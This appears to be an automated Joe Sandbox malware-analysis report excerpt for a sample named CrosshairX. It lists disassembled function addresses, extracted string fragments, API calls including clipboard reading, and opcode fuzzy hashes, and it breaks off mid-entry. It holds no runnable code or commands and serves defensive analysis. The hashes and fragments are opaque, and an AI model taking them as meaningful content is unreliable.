RtlAllocateHeap.NTDLL(?,00000000,?,A9A32DC4,00408B43,4948AF4E), ref: 00441170

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 30fa0d476ea0abc4f4c6b38ed19b560579e410675318e209a31e992a9af234a8
Instruction ID: aa0fcdf3c757321e4212b2b871eb358abbb11b080dde049c23a2622574f2159e
Opcode Fuzzy Hash: 30fa0d476ea0abc4f4c6b38ed19b560579e410675318e209a31e992a9af234a8
Instruction Fuzzy Hash: E7C09B31055120ABD5103B15FC09FC73F54DF45355F1600B5B00867172C760AC41C6D8

Non-executed Functions

Function 0043BB2E Relevance: 71.6, Strings: 57, Instructions: 383COMMON

Download Yara Rule

Strings

4, xrefs: 0043C16A
!, xrefs: 0043BD63
c, xrefs: 0043BBB1
?, xrefs: 0043BCAD
%, xrefs: 0043BD47
T, xrefs: 0043BD94
3, xrefs: 0043BD01
7, xrefs: 0043BCE5
), xrefs: 0043BD2B
-, xrefs: 0043BD0F
9, xrefs: 0043BCBB
-, xrefs: 0043BDE8
I, xrefs: 0043BDCC
#, xrefs: 0043BD71
J, xrefs: 0043BE2E
i, xrefs: 0043BB6B
g, xrefs: 0043BE90
s, xrefs: 0043BB41
8, xrefs: 0043BBD4
q, xrefs: 0043C07D
q, xrefs: 0043BEC8
., xrefs: 0043BC36
g, xrefs: 0043BB95
e, xrefs: 0043BB87
@, xrefs: 0043BD78
g, xrefs: 0043BE82
6, xrefs: 0043BBFE
o, xrefs: 0043BE58
e, xrefs: 0043BE9E
7, xrefs: 0043BED6
k, xrefs: 0043BB79
J, xrefs: 0043BDBE
A, xrefs: 0043BDDA
m, xrefs: 0043BE74
m, xrefs: 0043BB4F
F, xrefs: 0043BB8E
[, xrefs: 0043BE4A
m, xrefs: 0043BEBA
u, xrefs: 0043C061
+, xrefs: 0043BD39
o, xrefs: 0043BB5D
1, xrefs: 0043BCF3
g, xrefs: 0043C053
W, xrefs: 0043BE12
\, xrefs: 0043BE04
,, xrefs: 0043BDF6
a, xrefs: 0043BBA3
*, xrefs: 0043BC52
X, xrefs: 0043BE3C
N, xrefs: 0043BB56
;, xrefs: 0043BCC9
M, xrefs: 0043BDA2
=, xrefs: 0043BC9F
', xrefs: 0043BD55
5, xrefs: 0043BCD7
Y, xrefs: 0043C195
/, xrefs: 0043BD1D

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: !$#$%$'$)$*$+$,$-$-$.$/$1$3$4$5$6$7$7$8$9$;$=$?$@$A$F$I$J$J$M$N$T$W$X$Y$[$\$a$c$e$e$g$g$g$g$i$k$m$m$m$o$o$q$q$s$u
API String ID: 0-9757409
Opcode ID: a07e66507d311412a2f0a82637027e525acebd920a7cf4ae140a311ae25d94ed
Instruction ID: 6e2689052b4bfd7487f8d12ff5baec7c201457e9ef9bb6fb5d975b0eb9ee0c23
Opcode Fuzzy Hash: a07e66507d311412a2f0a82637027e525acebd920a7cf4ae140a311ae25d94ed
Instruction Fuzzy Hash: EF221E309087E9C9DB32C63C8C487DDAEA15B67324F0843D9D1A96B3D2D7B50B85CB66

Function 0043B44E Relevance: 40.3, Strings: 32, Instructions: 276COMMON

Download Yara Rule

Strings

c, xrefs: 0043B4A3
9, xrefs: 0043B53B
?, xrefs: 0043B64E
=, xrefs: 0043B54B
*, xrefs: 0043B4FF
9, xrefs: 0043B636
o, xrefs: 0043B493
E, xrefs: 0043B626
2, xrefs: 0043B65A
e, xrefs: 0043B4AB
i, xrefs: 0043B47B
1, xrefs: 0043B55B
k, xrefs: 0043B483
<, xrefs: 0043B5FB
0, xrefs: 0043B557
>, xrefs: 0043B604
L, xrefs: 0043B487
<, xrefs: 0043B4C7
w, xrefs: 0043B473
3, xrefs: 0043B65E
a, xrefs: 0043B49B
;, xrefs: 0043B543
0, xrefs: 0043B716
u, xrefs: 0043B46B
=, xrefs: 0043B646
?, xrefs: 0043B553
g, xrefs: 0043B4B3
1, xrefs: 0043B656
2, xrefs: 0043B4DF
G, xrefs: 0043B62E
m, xrefs: 0043B48B
;, xrefs: 0043B63E

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: *$0$0$1$1$2$2$3$9$9$;$;$<$<$=$=$>$?$?$E$G$L$a$c$e$g$i$k$m$o$u$w
API String ID: 0-1292338150
Opcode ID: 412177f6d20901103a914b918e710228892c4e1af30e47df0c9bba9695d49e38
Instruction ID: ec994206af6c8e633fb3474f8119681f9b4564baaa85ed095c1aedaa017bd81f
Opcode Fuzzy Hash: 412177f6d20901103a914b918e710228892c4e1af30e47df0c9bba9695d49e38
Instruction Fuzzy Hash: 92D1B321D087D9CEDB22C67C88443DDBFB15B17324F1842DAD4A4AB3D2C7B9494ACB66

Function 0043C2DE Relevance: 40.3, Strings: 32, Instructions: 268COMMON

Download Yara Rule

Strings

<, xrefs: 0043C47B
<, xrefs: 0043C347
o, xrefs: 0043C313
E, xrefs: 0043C4A6
u, xrefs: 0043C2EB
g, xrefs: 0043C333
G, xrefs: 0043C4AE
a, xrefs: 0043C31B
>, xrefs: 0043C484
c, xrefs: 0043C323
*, xrefs: 0043C37F
1, xrefs: 0043C3DB
?, xrefs: 0043C4CE
w, xrefs: 0043C2F3
k, xrefs: 0043C303
3, xrefs: 0043C4DE
1, xrefs: 0043C4D6
i, xrefs: 0043C2FB
2, xrefs: 0043C35F
=, xrefs: 0043C4C6
0, xrefs: 0043C3D7
m, xrefs: 0043C30B
?, xrefs: 0043C3D3
=, xrefs: 0043C3CB
L, xrefs: 0043C307
;, xrefs: 0043C4BE
;, xrefs: 0043C3C3
9, xrefs: 0043C3BB
2, xrefs: 0043C4DA
9, xrefs: 0043C4B6
0, xrefs: 0043C596
e, xrefs: 0043C32B

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: *$0$0$1$1$2$2$3$9$9$;$;$<$<$=$=$>$?$?$E$G$L$a$c$e$g$i$k$m$o$u$w
API String ID: 0-1292338150
Opcode ID: f8975e62c9f4276bff5c5c5a0d262b22b9355064457d7937d2230946b579056d
Instruction ID: d7ce14220ef04c6f63449fb05fcfad32834235a9bc3b22ee4ecb54859d3aafa2
Opcode Fuzzy Hash: f8975e62c9f4276bff5c5c5a0d262b22b9355064457d7937d2230946b579056d
Instruction Fuzzy Hash: C6D191219087D9CEDB22C6BC88443DDBFB15B17324F18429AD4A4BB3D2C7B94946CB66

Function 00432F50 Relevance: 28.4, Strings: 22, Instructions: 856COMMON

Download Yara Rule

Strings

i`C, xrefs: 00433AA9
WPC, xrefs: 0043377F
>OC, xrefs: 00433BB7
&YC, xrefs: 004336CD
1]C, xrefs: 004339C3
(PC, xrefs: 00433847
XC, xrefs: 00433A41
dLC, xrefs: 00433B8B
hHC, xrefs: 004339D9
OJC, xrefs: 00433B75
]NC, xrefs: 00433963
cOC, xrefs: 00433BA1
3LC, xrefs: 004338B7
=PC, xrefs: 00433831
%`C, xrefs: 00433717
uXC, xrefs: 004338E3
'OC, xrefs: 00433911
NC, xrefs: 00433AD5
OC, xrefs: 00433657
DGC, xrefs: 0043366D
uXC, xrefs: 004338CD
=NC, xrefs: 00433979

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: %`C$&YC$'OC$(PC$1]C$3LC$=NC$=PC$>OC$DGC$OJC$WPC$]NC$cOC$dLC$hHC$i`C$uXC$uXC$NC$OC$XC
API String ID: 0-2785805601
Opcode ID: d53422aa8caa1a323d8331014a5f9ed76a29c768c719fad05c3e36b008da4719
Instruction ID: e11e99b460d68f42c9ce75fd8c68eeef91988ddd3c1737b6e5936263a9d07885
Opcode Fuzzy Hash: d53422aa8caa1a323d8331014a5f9ed76a29c768c719fad05c3e36b008da4719
Instruction Fuzzy Hash: 79825AB0609B419FD365CF3DC851797BFE8AB1A304F44896EE1AEC7342C779A5008B5A

Function 00427EF4 Relevance: 23.0, Strings: 18, Instructions: 494COMMON

Download Yara Rule

Strings

%N<L, xrefs: 00428417
S;65, xrefs: 00428746
1n3l, xrefs: 00428467
<j4h, xrefs: 00428471
,5./, xrefs: 004287D5, 004287F9, 00428864, 00428874
):'$, xrefs: 00428835
zx, xrefs: 0042821B
/b)`, xrefs: 0042845D
z6]4, xrefs: 0042838B
_2Z0, xrefs: 00428395
"z x, xrefs: 00428449
$f(d, xrefs: 00428453
^>R<, xrefs: 0042839F
L+, xrefs: 00428003
d&u$, xrefs: 004283B3
rp, xrefs: 00428435
Y:j8, xrefs: 004283A9
u"G , xrefs: 004283BD

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: "z x$$f(d$%N<L$):'$$,5./$/b)`$1n3l$<j4h$L+$S;65$Y:j8$^>R<$_2Z0$d&u$$u"G $z6]4$rp$zx
API String ID: 0-3971781749
Opcode ID: 7dfcac816c3d78248a77a6bda5d2b8f7187e24cb80e572b79a7704245691bc83
Instruction ID: dda6567ec0e2fa6c610fa96ada8f1c630f146703bdf33519c1708a9e0c85b99f
Opcode Fuzzy Hash: 7dfcac816c3d78248a77a6bda5d2b8f7187e24cb80e572b79a7704245691bc83
Instruction Fuzzy Hash: 183230B48052298EDB24DF5598907AEBBB0FF41304F58D6EDC89C2B251DB794A86CFC4

Function 00418459 Relevance: 22.0, APIs: 4, Strings: 8, Instructions: 969COMMON

Download Yara Rule

Strings

WVj, xrefs: 00418F05
PWj, xrefs: 00418AE1
Q^, xrefs: 00418781
F, xrefs: 0041851A
R701, xrefs: 00418979
3^, xrefs: 00418779
%, xrefs: 00419333
L^, xrefs: 00418771

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: %$3^$F$L^$PWj$Q^$R701$WVj
API String ID: 0-3486062682
Opcode ID: 5b2fafeb7be16459a9415ffeb73af2884c0040c35e620d87c2dafe0be06a0abf
Instruction ID: 9980eb26cc913d6cfa11656da80747f5526f04d61ba645ece207b65c388b1d1a
Opcode Fuzzy Hash: 5b2fafeb7be16459a9415ffeb73af2884c0040c35e620d87c2dafe0be06a0abf
Instruction Fuzzy Hash: A272E071508351CBD314CF28C8917ABBBE1EFD5354F188A2DE4C98B3A1EB788945CB96

Function 00412030 Relevance: 18.1, APIs: 2, Strings: 8, Instructions: 574COMMON

Download Yara Rule

Strings

%, xrefs: 0041228C
>, xrefs: 004120F8
d, xrefs: 00412284
I, xrefs: 00412274
k, xrefs: 0041227C
S, xrefs: 0041245A
=, xrefs: 00412675
J, xrefs: 00412046

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: %$=$>$I$J$S$d$k
API String ID: 0-2557466952
Opcode ID: a75975ceff7da1b5698f54c67fe61727f9327842344e3cce80f3d82a0b32b5b5
Instruction ID: 12871f5c9d0bae5388be85a2fccb2feb3cd6aaa451b0ca3a74e76d3513a2e38d
Opcode Fuzzy Hash: a75975ceff7da1b5698f54c67fe61727f9327842344e3cce80f3d82a0b32b5b5
Instruction Fuzzy Hash: EE32E47250C7908FD7249B3885843AFBBE1ABD5324F194A3ED8D9D73C2D67889418B4B

Function 0042A430 Relevance: 16.5, Strings: 13, Instructions: 260COMMON

Download Yara Rule

Strings

\:O8, xrefs: 0042AD3F
g*w(, xrefs: 0042AD1F
,J>H, xrefs: 0042AD5F
U>e<, xrefs: 0042AD37
h"G , xrefs: 0042AD0F
Q, xrefs: 0042AC31
=N"L, xrefs: 0042AD57
r6v4, xrefs: 0042AD27
~.|,, xrefs: 0042AD17
k2~0, xrefs: 0042AD2F
P&u$, xrefs: 0042AD07
CF*D, xrefs: 0042AD47
IV, xrefs: 0042AD67

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: ,J>H$=N"L$CF*D$IV$P&u$$Q$U>e<$\:O8$g*w($h"G $k2~0$r6v4$~.|,
API String ID: 0-2646661379
Opcode ID: 387d88b2a45d90ef80da115c3b9cc6ae47730d09904d895ad5a2f579da84e6c4
Instruction ID: c62a59d53872446eb932d95e602be902b561fbade6c64e4fd4862e992d195d58
Opcode Fuzzy Hash: 387d88b2a45d90ef80da115c3b9cc6ae47730d09904d895ad5a2f579da84e6c4
Instruction Fuzzy Hash: 2791AAB56097808BE320CF69D94575BBFE1ABC1708F14492DE9E48B3A2D779C809CB47

Function 0040B3A0 Relevance: 15.3, Strings: 12, Instructions: 258COMMON

Download Yara Rule

Strings

Q)T+, xrefs: 0040B4A8
CqDs, xrefs: 0040B584
TuNw, xrefs: 0040B58E
tAC, xrefs: 0040B50C
i=k, xrefs: 0040B548
MyI{, xrefs: 0040B570
$U*W, xrefs: 0040B53E
W!Q#, xrefs: 0040B4BC
nYn[, xrefs: 0040B520
e]~_, xrefs: 0040B52A
H-Q/, xrefs: 0040B4B2
2MxO, xrefs: 0040B502

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: i=k$$U*W$2MxO$CqDs$H-Q/$MyI{$Q)T+$TuNw$W!Q#$e]~_$nYn[$tAC
API String ID: 0-2382243058
Opcode ID: 511e0f82720be04b41213502e5f85a1a3fe47b65262fe136dd30b7d2e27197d1
Instruction ID: 40ad47a46e4741e89054fc3dba86644fd33e20a32adb9d7331758cbd6b38b3ab
Opcode Fuzzy Hash: 511e0f82720be04b41213502e5f85a1a3fe47b65262fe136dd30b7d2e27197d1
Instruction Fuzzy Hash: ADC164B2640B408FD334CF2AD882797BBE5FB85314F148A2DD5AA8BB90D775A405CF84

Function 0042AF1D Relevance: 12.8, APIs: 2, Strings: 5, Instructions: 592COMMON

Download Yara Rule

Strings

Do, xrefs: 0042B1A1
Wuv7, xrefs: 0042B2D2
Y;, xrefs: 0042B199
,[, xrefs: 0042B191
Wuv7, xrefs: 0042B236, 0042B225

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: ,[$Do$Wuv7$Wuv7$Y;
API String ID: 0-413159385
Opcode ID: 6caba4afda02ce6d07ab335f91660f3d392282794ceef22ce40ec1a987885ac8
Instruction ID: f196387fb257ce98031b4956bc1da16f5a6218d06b9583ec156c39708ef8a687
Opcode Fuzzy Hash: 6caba4afda02ce6d07ab335f91660f3d392282794ceef22ce40ec1a987885ac8
Instruction Fuzzy Hash: 3B1203B5A083148FD7148F28D88172BB7E1FBC9304F49493DE9999B382DB78D805CB86

Function 004094A0 Relevance: 11.7, Strings: 9, Instructions: 450COMMON

Download Yara Rule

Strings

VU, xrefs: 004096A9
79ih, xrefs: 004098AE
<HIC, xrefs: 004094D7
V], xrefs: 004094FF
|, xrefs: 00409859
T82F, xrefs: 004094C7
AH@;, xrefs: 004094DF
{VT/, xrefs: 004097DE
y, xrefs: 004096B0

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: 79ih$<HIC$AH@;$T82F$VU$V]$y${VT/$|
API String ID: 0-516809741
Opcode ID: 7b9032eb4bd35f5e3d99bba0af72f4c1c4d58ce44e2f89bcfce13bf7f176a502
Instruction ID: f2099bf756f496caf09f83fb1d1f0daa8500d5445b22638eadcfb5b6787b15ff
Opcode Fuzzy Hash: 7b9032eb4bd35f5e3d99bba0af72f4c1c4d58ce44e2f89bcfce13bf7f176a502
Instruction Fuzzy Hash: C2D1017251C3808BD7248F29805036BFFE1AF96344F18896ED4D5AB393D379C80ACB96

Function 00445220 Relevance: 11.4, Strings: 9, Instructions: 122COMMON

Download Yara Rule

Strings

-, xrefs: 0044535F
V, xrefs: 0044524B
/, xrefs: 00445369
!, xrefs: 004452A9
U, xrefs: 00445246
, xrefs: 004452A4
&, xrefs: 004452AE
., xrefs: 00445364
W, xrefs: 00445250

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: $!$&$-$.$/$U$V$W
API String ID: 0-3809789748
Opcode ID: 005409e7866bdc793fb5b1c04b61b72af549296d2ea9a0d36fe3bde37a1c813c
Instruction ID: 0aa7ed8402ced90c3a776ecd61453ffd317a32de0460a4b44af8f796d3ec57e0
Opcode Fuzzy Hash: 005409e7866bdc793fb5b1c04b61b72af549296d2ea9a0d36fe3bde37a1c813c
Instruction Fuzzy Hash: A341A16010C7908BEB098E25945436FBFD26BD2318F98895EE4D6473C2C6BE8809CB97

Function 00429670 Relevance: 10.4, Strings: 8, Instructions: 410COMMON

Download Yara Rule

Strings

'H(N, xrefs: 00429ACA
U+, xrefs: 00429772
Y\, xrefs: 00429782
!J, xrefs: 0042978A
2TUZ, xrefs: 00429AE2
/V, xrefs: 0042977A
0D5J, xrefs: 00429AC2
2P<V, xrefs: 00429ADA

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: !J$'H(N$/V$0D5J$2P<V$2TUZ$U+$Y\
API String ID: 0-2694607278
Opcode ID: 25e0d3bc89c5feebe81d5c29e0cea231420b6ea0bd3bd3fb51de3ac3bb5c88f8
Instruction ID: 1ac6cfbdbea3fb0166e41acbebff7f1393d1a17534bf7665ae23410c19831d56
Opcode Fuzzy Hash: 25e0d3bc89c5feebe81d5c29e0cea231420b6ea0bd3bd3fb51de3ac3bb5c88f8
Instruction Fuzzy Hash: 9CE103B5209340CFE724CF25E891B6BBBF1FB86304F544A2DE1898B2A1D7389845CB56

Function 0043D430 Relevance: 10.2, Strings: 8, Instructions: 223COMMON

Download Yara Rule

Strings

U, xrefs: 0043D577
S, xrefs: 0043D581
N, xrefs: 0043D572
&, xrefs: 0043D52C
;, xrefs: 0043D51D
;, xrefs: 0043D522
C, xrefs: 0043D57C
8, xrefs: 0043D527

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: &$8$;$;$C$N$S$U
API String ID: 0-3599941485
Opcode ID: b8c73becaef156185349a7a9d59c268b0323e70ad22df6a1001dd9bf320bb757
Instruction ID: a28241f055d36201a779f952df727d3f7fcef168143f81d256ccc06de5f45049
Opcode Fuzzy Hash: b8c73becaef156185349a7a9d59c268b0323e70ad22df6a1001dd9bf320bb757
Instruction Fuzzy Hash: C181C36290D7D08AD311863C984435FAFD15BE7228F6D9E9DE4E18B3C3C269C80AD767

Function 004105CB Relevance: 9.7, Strings: 7, Instructions: 988COMMON

Download Yara Rule

Strings

+, xrefs: 0041117B
V, xrefs: 0041102D
K, xrefs: 00411032
2, xrefs: 00410879
D, xrefs: 00411037
+, xrefs: 004107B4
., xrefs: 00410D3F

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: +$+$.$2$D$K$V
API String ID: 0-3124596234
Opcode ID: 1374af9e7baf996b3e7a5f9b14a63c7a420659938afff9bf4a64cabe7e26b35c
Instruction ID: 39e5a473057f0d48c1ccc926edec08731ad73929a3629933e52f3095c0f48470
Opcode Fuzzy Hash: 1374af9e7baf996b3e7a5f9b14a63c7a420659938afff9bf4a64cabe7e26b35c
Instruction Fuzzy Hash: 1682D17290C7808BD3249B38C4853AFBBD1ABD5324F198A3EE5D9C73D2D67889858747

Function 0041A8F0 Relevance: 9.6, APIs: 2, Strings: 3, Instructions: 884COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 0041ADC7

Part of subcall function 00442EE0: LdrInitializeThunk.NTDLL(004462CB,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00442F0E

FreeLibrary.KERNEL32(?), ref: 0041AE04

Strings

r{, xrefs: 0041ACA6
I~, xrefs: 0041AC96
I^, xrefs: 0041AC9E

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: I^$I~$r{
API String ID: 764372645-3947438656
Opcode ID: bf9e9b555bdfee25ee08b43b7f11e88ad01a93ed04d2f55229d8ed019cbc9ee5
Instruction ID: 01d10e7787a4631e60205b4b194827228a4ca0f1996a3436fac5a873df22c0aa
Opcode Fuzzy Hash: bf9e9b555bdfee25ee08b43b7f11e88ad01a93ed04d2f55229d8ed019cbc9ee5
Instruction Fuzzy Hash: 216219742083009BE724DF25DD4076BBBE2EF85314F24862EE1955B3A2D375DC96CB8A

Function 00415BA0 Relevance: 9.2, Strings: 7, Instructions: 433COMMON

Download Yara Rule

Strings

(]?_, xrefs: 00415FFD
$Q7S, xrefs: 00416008
?A!C, xrefs: 00415FDC
naA, xrefs: 00416168
%E:G, xrefs: 00415FE7
TU, xrefs: 00416013
xY[, xrefs: 00415FF2

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: $Q7S$%E:G$(]?_$?A!C$TU$naA$xY[
API String ID: 0-4025377870
Opcode ID: 5b1af31a811106828254fe63f494c39b45190b2813ed431d95a7c1545a3e6497
Instruction ID: 001f5bf3ad3b7359d107e140a27ced6076e8ce19b5bd3f69ef3686efef87c443
Opcode Fuzzy Hash: 5b1af31a811106828254fe63f494c39b45190b2813ed431d95a7c1545a3e6497
Instruction Fuzzy Hash: 35D1DEB4508740CBD7249F24DC91BEBB7B1EFD6314F04492DE5898B3A1EB389841CB9A

Function 00438A00 Relevance: 9.1, APIs: 6, Instructions: 128clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00438A22
GetClipboardData.USER32 ref: 00438A45
GlobalLock.KERNEL32 ref: 00438A62
CloseClipboard.USER32 ref: 00438B8A

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: Clipboard$CloseDataGlobalLockOpen
String ID:
API String ID: 1494355150-0
Opcode ID: e65233d46411d2d693bbe1646db2b54a8d69f46908d3ff38525457bca6ae2f3b
Instruction ID: ef8bd7f09762d89d12810a956e612d186e0140fa3ff097530d94014580fdeec5
Opcode Fuzzy Hash: e65233d46411d2d693bbe1646db2b54a8d69f46908d3ff38525457bca6ae2f3b
Instruction Fuzzy Hash: A941D1B0808782DFD701AB78D44939EFFA0AB16314F04852EE48587242D77DA959C7AB

Function 0042FF00 Relevance: 9.0, Strings: 7, Instructions: 264COMMON

Download Yara Rule

Strings

\GRE, xrefs: 004300D6
@YEK, xrefs: 004300F7
wH, xrefs: 004301BE
QJ^C, xrefs: 004300EC
9* , xrefs: 004300AA
0Q, xrefs: 0042FF2C
kU^l, xrefs: 004300E1

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: wH$0Q$@YEK$QJ^C$\GRE$kU^l$9*
API String ID: 0-2723097402
Opcode ID: 38de97d904f7cdd0fe8619db2c81dd6e453455af23a2edbc30b68c1945b5becf
Instruction ID: 82f260bbe69a59db9370e35746be78153c643d5e4283fc080d322194ba7af092
Opcode Fuzzy Hash: 38de97d904f7cdd0fe8619db2c81dd6e453455af23a2edbc30b68c1945b5becf
Instruction Fuzzy Hash: 6F81ADB840D3D08AD7358F2585A53DBBFE1AF96304F184A9DD4E91B385CB7A050ACB87

Function 00417306 Relevance: 8.0, Strings: 6, Instructions: 550COMMON

Download Yara Rule

Strings

Z4X:, xrefs: 00417987
F{A, xrefs: 004177CE
gd, xrefs: 00417A0B
U0Q6, xrefs: 004175A5
i, xrefs: 004177FC
D, xrefs: 004177C6

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: D$F{A$U0Q6$Z4X:$gd$i
API String ID: 0-2464347595
Opcode ID: a4ca032438b1f535d83da253b049e1c5127b483948029a6bef5a2dfb77573866
Instruction ID: eb3c9b221c2a8dbdca8da70bcf4499cbfc5942c0b890738997eb5b53615372e8
Opcode Fuzzy Hash: a4ca032438b1f535d83da253b049e1c5127b483948029a6bef5a2dfb77573866
Instruction Fuzzy Hash: 3212ADB050C390CAE3248F14C4657ABBBF1FF91318F149A5DD4C95B391D7BA8845CB9A

Function 0043169D Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 236COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 0043184F

Strings

%&, xrefs: 00431888
